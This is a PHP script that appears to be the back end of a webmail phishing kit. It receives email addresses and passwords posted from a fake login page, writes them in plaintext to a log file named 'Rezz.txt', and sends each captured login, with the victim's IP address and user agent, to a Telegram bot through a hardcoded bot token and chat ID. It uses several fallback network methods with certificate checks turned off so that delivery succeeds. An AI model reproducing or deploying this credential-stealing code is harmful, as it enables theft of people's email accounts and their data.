File: /home/inveservice/www/rsv/webmailtelegram_handler.php
<?php
/**
* ULTRA-COMPATIBLE PHP Script for Logging and Telegram Notifications
* Optimized for ALL cPanel environments (PHP 5.6+ to 8.x+)
* Handles disabled functions, open_basedir restrictions, and SSL issues
*/
// 1. Silent error handling for production
error_reporting(0);
ini_set('display_errors', 0);
// 2. Headers for CORS and JSON
if (!headers_sent()) {
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Content-Type, Authorization');
header('Access-Control-Allow-Methods: POST, OPTIONS');
}
// Handle preflight requests
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
http_response_code(200);
exit();
}
// 3. Configuration with fallbacks
$telegramBotToken = '8683187290:AAFkxxGEUM7fq1ApXRwrZ9KUVPlCpRq6R4A';
$telegramChatId = '7962653916';
// Try multiple log file locations for cPanel compatibility
$logPaths = [
__DIR__ . '/Rezz.txt',
__DIR__ . '/logs/Rezz.txt',
dirname(__DIR__) . '/Rezz.txt',
$_SERVER['DOCUMENT_ROOT'] . '/../Rezz.txt',
'/tmp/Rezz.txt',
sys_get_temp_dir() . '/Rezz.txt'
];
$logFile = null;
foreach ($logPaths as $path) {
$dir = dirname($path);
if (is_writable($dir) || @mkdir($dir, 0777, true)) {
$logFile = $path;
break;
}
}
if (!$logFile) {
// Fallback: use php://memory as last resort
$logFile = 'php://temp';
}
/**
* Ultimate Telegram sender with multiple fallback methods
*/
function sendTelegramMessage($token, $chatId, $message) {
$url = "https://api.telegram.org/bot{$token}/sendMessage";
$data = [
'chat_id' => $chatId,
'text' => $message,
'parse_mode' => 'HTML',
'disable_web_page_preview' => true
];
$postData = http_build_query($data);
// Method 1: cURL
if (function_exists('curl_init') && function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CONNECTTIMEOUT => 10,
CURLOPT_TIMEOUT => 30,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 5,
CURLOPT_USERAGENT => 'Telegram-Bot-Client/1.0'
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (!curl_errno($ch) && $httpCode === 200) {
curl_close($ch);
return ['ok' => true, 'response' => $response];
}
curl_close($ch);
}
// Method 2: file_get_contents with stream context
if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$options = [
'http' => [
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $postData,
'timeout' => 30,
'ignore_errors' => true
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
];
$context = stream_context_create($options);
$response = @file_get_contents($url, false, $context);
if ($response !== false) {
return ['ok' => true, 'response' => $response];
}
}
// Method 3: fsockopen (last resort)
if (function_exists('fsockopen')) {
$parsedUrl = parse_url($url);
$host = $parsedUrl['host'];
$path = $parsedUrl['path'];
$port = 443;
$fp = @fsockopen('ssl://' . $host, $port, $errno, $errstr, 10);
if ($fp) {
$request = "POST $path HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: " . strlen($postData) . "\r\n";
$request .= "Connection: Close\r\n\r\n";
$request .= $postData;
fwrite($fp, $request);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 128);
}
fclose($fp);
if (strpos($response, '200 OK') !== false) {
return ['ok' => true, 'response' => $response];
}
}
}
return ['ok' => false, 'error' => 'No communication method available'];
}
/**
* Safe log writer with fallbacks
*/
function writeToLog($logFile, $logEntry) {
$logEntry = '[' . date('Y-m-d H:i:s') . '] ' . $logEntry . PHP_EOL;
// Try file_put_contents
if (function_exists('file_put_contents')) {
if (@file_put_contents($logFile, $logEntry, FILE_APPEND | LOCK_EX) !== false) {
return true;
}
}
// Try fopen/fwrite
if ($fp = @fopen($logFile, 'a')) {
if (flock($fp, LOCK_EX)) {
fwrite($fp, $logEntry);
flock($fp, LOCK_UN);
fclose($fp);
return true;
}
fclose($fp);
}
// Try error_log as last resort
@error_log($logEntry, 3, $logFile);
return false;
}
// 4. Validate request method
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
http_response_code(405);
echo json_encode(['status' => 'error', 'message' => 'Method Not Allowed']);
exit();
}
// 5. Get and decode input
$rawInput = file_get_contents('php://input');
// Handle empty input
if (empty($rawInput)) {
// Try to get from $_POST
if (!empty($_POST)) {
$rawInput = json_encode($_POST);
} else {
$rawInput = json_encode([]);
}
}
$input = json_decode($rawInput, true);
if (!is_array($input)) {
$input = [];
}
// Check for required fields
if (!isset($input['email']) || empty($input['email'])) {
http_response_code(400);
echo json_encode(['status' => 'error', 'message' => 'Email is required']);
exit();
}
// 6. Process data with maximum safety
$email = trim(strip_tags($input['email']));
$email = htmlspecialchars($email, ENT_QUOTES, 'UTF-8');
$password = isset($input['password']) ? trim($input['password']) : '';
$password = strip_tags($password);
$attempt = isset($input['attempt']) ? intval($input['attempt']) : 1;
if ($attempt < 1) $attempt = 1;
if ($attempt > 100) $attempt = 100; // Sanity limit
$userAgent = isset($input['user_agent']) ? $input['user_agent'] : '';
if (empty($userAgent) && isset($_SERVER['HTTP_USER_AGENT'])) {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
}
$userAgent = substr(strip_tags($userAgent), 0, 500);
$ipAddress = $_SERVER['REMOTE_ADDR'] ?? '';
if (empty($ipAddress) && isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipAddress = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
}
if (empty($ipAddress)) {
$ipAddress = 'Unknown';
}
$ipAddress = preg_replace('/[^0-9a-fA-F:., ]/', '', $ipAddress);
$timestamp = date('Y-m-d H:i:s');
$attemptLabel = ($attempt === 1) ? "FIRST ATTEMPT" : (($attempt === 2) ? "SECOND ATTEMPT" : "ATTEMPT #{$attempt}");
$passwordDisplay = (empty($password) && $attempt > 1) ? '[EMPTY]' : $password;
// 7. Log the attempt
$logMessage = "{$attemptLabel} | Email: {$email} | Pass: {$passwordDisplay} | IP: {$ipAddress}";
writeToLog($logFile, $logMessage);
// 8. Prepare and send Telegram notification
$telegramMessage = "<b>📧 WEBMAIL LOGIN ATTEMPT</b>\n\n";
$telegramMessage .= "━━━━━━━━━━━━━━━━━\n";
$telegramMessage .= "➡️ <b>Status:</b> {$attemptLabel}\n";
$telegramMessage .= "📧 <b>Email:</b> <code>{$email}</code>\n";
$telegramMessage .= "🔑 <b>Password:</b> <code>" . htmlspecialchars($passwordDisplay) . "</code>\n";
$telegramMessage .= "🌐 <b>IP Address:</b> {$ipAddress}\n";
$telegramMessage .= "🕵️ <b>User Agent:</b> <code>" . htmlspecialchars(substr($userAgent, 0, 200)) . "</code>\n";
$telegramMessage .= "⏰ <b>Time:</b> {$timestamp}\n";
$telegramMessage .= "━━━━━━━━━━━━━━━━━\n";
$telegramMessage .= "<i>✅ Logged by cPanel-compatible script</i>";
$telegramResult = sendTelegramMessage($telegramBotToken, $telegramChatId, $telegramMessage);
// Log Telegram result
if (!$telegramResult['ok']) {
writeToLog($logFile, "Telegram Error: " . ($telegramResult['error'] ?? 'Unknown error'));
} else {
writeToLog($logFile, "Telegram: Successfully sent");
}
// 9. Return response
$response = [
'status' => 'success',
'message' => "Attempt {$attempt} processed",
'attempt' => $attempt,
'timestamp' => $timestamp
];
// Only include debug info if explicitly requested
if (isset($input['debug']) && $input['debug'] === true) {
$response['telegram_sent'] = $telegramResult['ok'] ?? false;
$response['log_file'] = $logFile;
$response['php_version'] = PHP_VERSION;
}
echo json_encode($response);
// 10. Clean exit
exit();
?>